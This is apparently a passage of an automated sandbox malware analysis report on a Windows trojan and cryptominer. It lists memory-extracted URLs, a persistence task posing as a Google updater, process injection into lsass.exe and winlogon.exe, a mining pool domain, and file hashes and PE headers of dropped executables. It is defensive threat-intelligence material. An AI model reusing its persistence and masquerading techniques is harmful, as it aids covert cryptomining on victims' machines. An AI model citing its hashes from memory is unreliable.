                  http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://contoso.com/Licensepowershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Iconpowershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.microsoft.powershell.exe, 00000006.00000002.1404686932.0000022851E13000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000009.00000002.2637267063.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347954124.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                http://crl.mC&powershell.exe, 00000006.00000002.1404686932.0000022851D80000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://cacerts.digicertlsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://xmrig.com/docs/algorithmsupdater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpfalse
                                        unknown
                                        http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.microsoft.nppowershell.exe, 00000006.00000002.1404686932.0000022851E13000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://aka.ms/pscore68powershell.exe, 00000006.00000002.1373300100.00000228393E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000009.00000002.2637267063.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347954124.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1373300100.00000228393E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              No contacted IP infos
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1528505
                                              Start date and time:2024-10-08 00:23:34 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 31s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:17
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:32
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:h2qWqtD73F.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:d0c2dd0e059c5011ed2eee4c65122177.exe
                                              Detection:MAL
                                              Classification:mal100.troj.evad.mine.winEXE@22/79@0/0
                                              EGA Information:
                                              • Successful, ratio: 90.5%
                                              HCA Information:
                                              • Successful, ratio: 68%
                                              • Number of executed functions: 72
                                              • Number of non-executed functions: 394
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
                                              • Excluded IPs from analysis (whitelisted): 199.232.214.172
                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, pool.hashvault.pro, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target h2qWqtD73F.exe, PID 7828 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 8124 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • VT rate limit hit for: h2qWqtD73F.exe
                                              TimeTypeDescription
                                              00:24:37Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
                                              18:24:28API Interceptor1x Sleep call for process: h2qWqtD73F.exe modified
                                              18:24:30API Interceptor80x Sleep call for process: powershell.exe modified
                                              18:24:41API Interceptor1x Sleep call for process: updater.exe modified
                                              18:24:47API Interceptor5412x Sleep call for process: svchost.exe modified
                                              18:25:06API Interceptor292853x Sleep call for process: lsass.exe modified
                                              18:25:06API Interceptor379190x Sleep call for process: winlogon.exe modified
                                              18:25:10API Interceptor356949x Sleep call for process: dwm.exe modified
                                              18:25:19API Interceptor1668x Sleep call for process: dialer.exe modified
                                              18:25:26API Interceptor36x Sleep call for process: spoolsv.exe modified
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              bg.microsoft.map.fastly.netSecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                              • 199.232.210.172
                                              https://login.stmarytx.edu/cas/logout?service=http%3A%2F%2Fgoogle.com%2Famp%2Fmatrikaengineeringworks.com/hebc/?#?m=bWVsaXNzYWdAd2Utd29ybGR3aWRlLmNvbQ==Get hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              WiTqtf1aiE.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 199.232.214.172
                                              https://s.craft.me/yB5midhwwaHUPWGet hashmaliciousHTMLPhisherBrowse
                                              • 199.232.214.172
                                              https://entertaininmotionre.pro/IQCm/Get hashmaliciousHTMLPhisherBrowse
                                              • 199.232.210.172
                                              https://dsdhie.org/dsjhemGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              FdjDPFGTZS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              • 199.232.214.172
                                              Aew8SXjXEb.exeGet hashmaliciousStealcBrowse
                                              • 199.232.214.172
                                              Adobe-Setup.msiGet hashmaliciousKorplugBrowse
                                              • 199.232.210.172
                                              https://dsdhie.org/dsjhemGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              No context
                                              No context
                                              No context
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 7796 bytes, 1 file, at 0x2c +A "pinrules.stl", number 1, 1 datablock, 0x1 compression
                                              Category:dropped
                                              Size (bytes):7796
                                              Entropy (8bit):7.971943145771426
                                              Encrypted:false
                                              SSDEEP:192:CPTIWKvNnUBBBL05O/b0evl2G6AXK+KMlYX82:CbevNUBDLlz0eN2dAXlKH
                                              MD5:FB60E1AFE48764E6BF78719C07813D32
                                              SHA1:A1DC74EF8495C9A1489DD937659B5C2875027E16
                                              SHA-256:EBF3E7290B8FD1E5509CAA69335251F22B61BAF3F9FF87B4E8544F3C1FEA279D
                                              SHA-512:92BAA53445EC1A6EC049AF875783619D255AB4A46241B456BD87AE0043C117740BD117406E2CF5440840C68D0C573CBA7B40F58587CE7796D254D0B06E9B7973
                                              Malicious:false
                                              Preview:MSCF....t.......,...................I........E.........J.R .pinrules.stl..>N.#..ECK.[.T...O......l.$.)V.a...v.d.H...&.D.YA,(+Y...A.......c]."ka-.XW..I.....w..|..9.........{...|d..v.T..w.TMZ.|...).F.rtAm.....f......T.*.......n.z.:.t&.} EH.S.)2...SP.../~.Q..d..".@.5..r(..M.Zs..~{...>...p.p.^....[/p..~.....@......f..E0....9.i...Ds..^.d...N.R@..P%..9... .4Z)...z..h...@.......C<.]6....([.c=.9..l.....@..4......f.......z.!..0.`Jp.."$I..?`......H...].2...$....9v1./g.&.aIX.A..A.w*..p.*.`r.........'!e.. ..d...H.d.hu`.\!w.Z..E.$....$..|1..@.OC!c.......%.....p.uxC.~@....`...#.~ .P.!.Gb`)i...L..0.-.K.....xRx.e"..@.....5T..JP^.9.....#aH.E.@2..H..f.H..K...+x..$.WM..H}....=....`.PD:.qgn........I.....]uX..q...D...]n.4..0..b!.....m"a.Lz...d..S%P.I11,..^..".+At..To\@K.....c.h.C.....=...H.Xa...r.A.I..@!..0..eV...|.h..$."r..hL9TR..}.v%...4).H..[.....r..|]..+5..Y..I..hN...O=u..8.}U...#S...R..KQ..A..w....X|.....8b...GC.4..h....6gG.>..}.8....!ql..A..1..X.C.q.j....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):330
                                              Entropy (8bit):3.3299129856994254
                                              Encrypted:false
                                              SSDEEP:6:kK7W81wNSWsCN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:i0FkPlE99Si1QyIeek
                                              MD5:FCCF6992BDB0452A533BC48FE5E7FE44
                                              SHA1:32CB820CB0BC8C69072D185383392E04DE2C0662
                                              SHA-256:688DCF08AAE61D8E421176BBA2B350AFEDAF552735A38D015D85C66F4CE049BA
                                              SHA-512:A0BDC4436A303E3F99A81A71DCDC793EA9FC314BA7300F0038A0E2D7680BE4DCCBDD68361E1358FC16BB56988332EC1A0B79E9A45CD36CF754A3DE5B4B0E5502
                                              Malicious:false
                                              Preview:p...... ........,.......(....................................................... ........B@!........(....0."....t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Preview:@...e...........................................................
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Users\user\Desktop\h2qWqtD73F.exe
                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                              Category:dropped
                                              Size (bytes):138240
                                              Entropy (8bit):5.95337186744805
                                              Encrypted:false
                                              SSDEEP:3072:0ZCV9dKCzJJsxho1gS3a5ly4l3+NOlUho3:Xdrbsxh0gS3AlZ3+KUh
                                              MD5:D0743EAF2216C162B3BA2D0351F26B46
                                              SHA1:4D2A216F1593CE2CBF158A68873A53F04AA60B5C
                                              SHA-256:637CCA4CFDA8CD02AF3442C23D3495F3DA80ABAA426C71B23E3EE7EACFFBA68A
                                              SHA-512:291AAC1C7EDB088F5BD8BD3D5030DDFADA6A1C1FCDC00F14EA03225649CABCD04665E5EC6CA84242281F3E0C210C56B4E20DFBDF238FAD3D84216B6983B9B7C6
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.......................@.....................................}....`... ..............................................`..4...............................8...........................`...(....................b..P............................text...............................`..`.data...............................@....rdata...<.......>..................@..@.pdata..............................@..@.xdata.......0......................@..@.bss.........@...........................idata..4....`......................@....CRT....`....p......................@....tls................................@....reloc..8...........................@..B................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\h2qWqtD73F.exe
                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                              Category:dropped
                                              Size (bytes):5980672
                                              Entropy (8bit):7.692419723657324
                                              Encrypted:false
                                              SSDEEP:98304:J8uD4BG85s9oxVU3MNkQ5Tmzku2D5YOttCTt9EwB6TQP+zyLlvxInBwae5MKc:Jz4UMCWQku2VvIt2q6TVyLlJIBwaf
                                              MD5:D0C2DD0E059C5011ED2EEE4C65122177
                                              SHA1:A992A12930F59A9BFF9A49337C004FEF02A9FA4E
                                              SHA-256:9DB1D611BBA928F40D86374641783083CDA4F613236F3EC21CE62BCDEEE9A6E6
                                              SHA-512:7B415D78FF03D7F700C58FBC14F98A426C968D47E8EF366BA845CFF2148D646B996B0B94438D6152EEEA801B3A8A8EC4806DE73F5D8513943E6E1519A5C624A5
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 55%
